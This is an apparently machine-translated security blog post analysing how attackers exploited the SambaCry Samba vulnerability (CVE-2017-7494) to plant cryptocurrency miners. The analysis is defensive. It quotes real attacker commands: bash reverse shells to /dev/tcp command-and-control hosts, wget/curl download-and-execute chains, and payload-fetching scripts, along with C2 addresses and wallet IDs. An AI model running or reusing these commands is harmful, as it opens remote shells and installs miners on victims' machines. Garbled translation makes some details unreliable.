360 core security technology blog

Author: redrain & houjingyi159 @ 360 Network Security Response Center

Samba released version 4.6.4 on May 24, 2017. A serious Remote Code Execution Vulnerability, cve-2017-7494, was fixed in the middle. The vulnerability affected all versions of samba from 3.5.0 to 4.6.4/4.5.10/4.4.14. 360 network security center and gear team of 360 information security department analyzed the vulnerability for the first time, and confirmed it was a serious vulnerability, which could cause remote code execution. Http://blogs.360.cn/blog/samba Remote Code Execution Vulnerability cve-2017-7494 analysis/

Sambacry vulnerability is a worm like vulnerability with scale propagation. Recently, Kaspersky Security Laboratory caught an attack of exploiting BOT maliciously through sambacry vulnerability for block connected digital currency mining through honeypot. Here, the 360 network security center and the 360 sun chasing team made a specific technical analysis of the back door used in the incident.

Loophole utilization

Because the vulnerability requires writable permission for SMB shared drive letter, according to the attack package captured by honeypot in Kaspersky Lab, the attacker first attempts to write a file with random character name to the server, and then delete it after success.

After successful detection, the attacker brutally guesses the full path of the file written to obtain the path of the shared directory, and writes the malicious lib as the payload.

After blasting to the correct path, use cve-2017-7494 vulnerability to load malicious lib execution command. Because Samba is started with root permission by default, the command executed by loading lib will also be executed with root permission. After successful utilization, delete the written lib and execute malicious command operation only in memory.

Malicious lib samples 349d84b3b176bbc983230351ef3bc2a_.so (inaebsgb. So) and 2009af3fed2a4704c224694dfc4b31dc_.so (cblrvuoc. So)

349d84b3b176bbc9834230351ef3bc2a_16106.so(INAebsGB.so) 2009af3fed2a4704c224694dfc4b31dc_30361.so(cblRWuoCc.so)

Sample analysis

In inaebsgb.so, the attacker executed a very simple bounce shell operation with / bin / sh to execute the download file or execute subsequent commands.

INAebsGB.so /bin/sh

It is found that this lib is actually generated by the is? Known? Pipename module of Metasploit.

is_known_pipename

Later, another libcblrwocc.so was written. In this lib, the attacker bounced back to the port 4000 of C2 server and downloaded a mining program, using BOT as CPU miner. In this sample, we located C2 server and mining program.

cblRWuoCc.so

In the act of execution:

bash -i < /dev/tcp/rc.ezreal.space/4000 || ((wget http://rc.ezreal.space/minerd64_s -O /tmp/m || curl http://rc.ezreal.space/minerd64_s -o /tmp/m) && chmod +x /tmp/m && (nohup /tmp/m &))

The attacker downloads http://rc.ezreal.space/minerd64_sand executes it when / TMP / M grants permission.

http://rc.ezreal.space/minerd64_s /tmp/m

Simply query C2 server as follows:

rc.ezreal.space
A记录 149.255.35.33

时间  IP  国家  省／州 运营商
2017-05-17  149.255.35.33   美国  伊利诺伊州   swiftway.net
2017-05-15  149.255.35.33   美国  伊利诺伊州   swiftway.net
2017-04-30  185.86.150.76   瑞典  西约塔兰省   

www.ezreal.space    191.101.31.100
cl.ezreal.space     191.101.31.100
rc2.ezreal.space    149.255.35.77
rc.ezreal.space     149.255.35.33

Typo hackers?

After connecting to port rc.ezreal.space4000 of C2 server, I see the following script:

rc.ezreal.space

#!/usr/bin/env bash
host='149.255.35.33';

nohup bash -i < /dev/tcp/${host}/4001 &
nohuo bash -i < /dev/tcp/${host}/4002 &
nohuo bash -i < /dev/tcp/${host}/4003 &

The attacker wanted to ignore the system hang up and run in the background through nohup, but he didn't know if it was due to careless handshake. Nohup called nohuo

nohup nohuo

Access the other three ports to get these scripts:

➜  /tmp nc 149.255.35.33 4001
#!/usr/bin/env bash



host='149.255.35.33';
target=$RANDOM; target+=.so; target=/tmp/$target;

cat < /dev/tcp/${host}/5000 > $target && chmod +x $target && nohup $target &

➜  /tmp nc 149.255.35.33 4002
#!/usr/bin/env bash

➜  /tmp nc 149.255.35.33 4003
#!/usr/bin/env bash

The miner program obtained from port 5000 in C2 is the same as that obtained from HTTP download

Miner analysis

Up to now, the C2 server is still alive. Download minerd64? S and simply analyze it. It is found that it is a common CPU mining program, miderd. However, the attacker does not have the common additional parameters, but hardcode all the parameters into the program, puts the parameters to be executed.

minerd64_s miderd

The attacker's mine pool and wallet address were quickly found here:

.rodata:0000000000515604 00000026 C stratum+tcp:
.rodata:00000000005156CC 00000060 C 43xtViRHn1oibjS6yZSgS6XhFFkSRGC5SHgmymH6ei4r5osjPrC1z85BeCZS89ZtL4iDGDoUhEoKtcVe115Wp7sB6XzHmgy

Through the transaction query of the mining pool, we know that the attacker is digging a kind of counterfeit currency 'xdn' and 'XmR'. Check the recent transfer in situation and find that the income is not bad:)

Another attack

I thought that our analysis and Kaspersky were almost the same, but I found that 360 day chasing team also provided a sample 1bb17e0d03ebd5acafbe60b70e38dec4.so (oooo. So)

1bb17e0d03ebd5acafbe60b70e38dec4.so(oooo.so)

This lib is very similar to cblrvuoc.so, but the operation is not the same

cblRWuoCc.so

Just bounce a port connected to C2 server, and return a shell script after connecting:

#!/usr/bin/env bash


pkill .so;

host='45.76.146.166';
target=$RANDOM; target+=.so; target=/tmp/$target;

cat < /dev/tcp/${host}/5555 > $target && chmod +x $target && nohup  $target &

Visit 45.76.146.166:5555 to get another miner program. The difference between Miner and wallet address is

.rodata:0000000000515604 00000024 C stratum+tcp:
.rodata:00000000005156CC 00000060 C 4AxoWMDfiPkh1PDHeyDi2TRpHC8hxHKY6ACtWRSY9Um4PuwPqjn9vAhdsSshmGu1RbZBUgKX42f584jGENHwXxsVGENHoGV

summary

From the beginning of sambacry vulnerability disclosure, we expect that hackers will make malicious use of it and make profits from it. We think that recently, due to the wannacry incident of eternalblue, hacker attacks are becoming normalized, especially when there are general and extremely easy to use vulnerabilities exposed, attacks may follow. With the increase of bitcoin value, the value of other virtual currencies also increases, which also provides a cash channel for hackers to make profits through network attacks..

Timeline

On May 24, 2017, samba released version 4.6.4, which fixed the Remote Code Execution Vulnerability cve-2017-74942017-5-25, 360 network security response center and 360 information security department jointly issued an early warning notice and the first vulnerability analysis. On May 30, 2017, Kaspersky Security Laboratory captured the wild malicious exploitation of sambacry through honeypot for the first time on June 12, 2017 360 network security response center and 360 sun chasing team jointly carry out technical analysis on attack mode

Reference source

https://securelist.com/sambacry-is-coming/78674/

The author cyg07 was published on June 13, 2017 at 02:41:28, and was added to classified virus analysis Next, last revised on August 14, 2018 14:47:41

cyg07 病毒分析

IMCAFS